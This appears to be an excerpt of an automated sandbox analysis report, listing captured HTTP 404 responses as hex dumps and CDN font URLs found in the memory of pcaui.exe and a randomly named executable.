                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:23:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:23:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:23:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:23:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8WBi5HM25E7enDUhJaqU7xdSjqHih%2FJoFVuWCuDtvKpCXnd8kLkuchCW%2FpCMVWvh9dq%2B74vhcKo1nNLQG0hml%2FZT3xvV1%2Fw2x9RH3MgOffCaAaJ%2BjHoyH3SaxwhG40%2FvDeHGgOQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af165b311811-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3020&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:24:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKCL1WGTcn7vM9epVkZymmt%2FLL%2BGkQUmigAT4BMUFvuQihnl2jUSGJCFnbOG4pytmvpjxYLwi0Eo9SwGHkSB8gcCQnHR9HPLL%2F3yzGxddhuvrZa8JDyva2JSn5ifL5ZTvxNpcb8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af26ab340f65-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=622&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:24:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zghla1s3RrQE4kuM1%2B3991YIerDBPGjH2R%2BBz6HRD8T9WCJLBenDSLHF20rYFtR8KgMyTdE6rrzQEoCVs88vWIrfFPmO1h9PnqeeljTiqrhw%2BB41r%2ByVTIUCnXTXdIlAgewQeAI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af378bd541e1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4646&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1635&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:24:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CtvCmy8vM6qq11k%2FxHyaNqMnLNvW354ybLYiIlQYDQEDf%2BVbpPdb%2BoHa0ClLpKhWHEcurvJFwK7FuKiYlHRseloyzTw%2BsDs%2Fgxmsf%2F5hFKlT5KopH5R9NRZbWKM1NzIW%2FVTDoOk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af47ceb143a9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1631&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=340&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:24:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfbhwjt07m%2BSUxAFwTfjhAKJZh5fc9GJ4lR9Poz%2FPlfqOqlDIhbdY3wRiLnEwVChJ2zGPWpEa3InWM1%2BtXsuT7168fhL93VIE4zJi0PaLIE3ejng4nVdZXQsqoKLWt2mw85KKpfZXmkF191g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af71c8a23300-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1981&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=619&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:24:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WDCHY61NjwdLKUF34ZwERuDzBLZfLMRMQrAaY8XqvTqomcU%2Ft%2BiqhtD4WX6UiXvD9lqXNVanh2XAU23gkqBsrM3h03B8qUlYifo5ZO9Solb0SqGb9HRyyq68sLUZPuD1%2BkCFcSifKWczICT5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61af89d93a15a3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=643&delivery_rate=0&cwnd=109&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
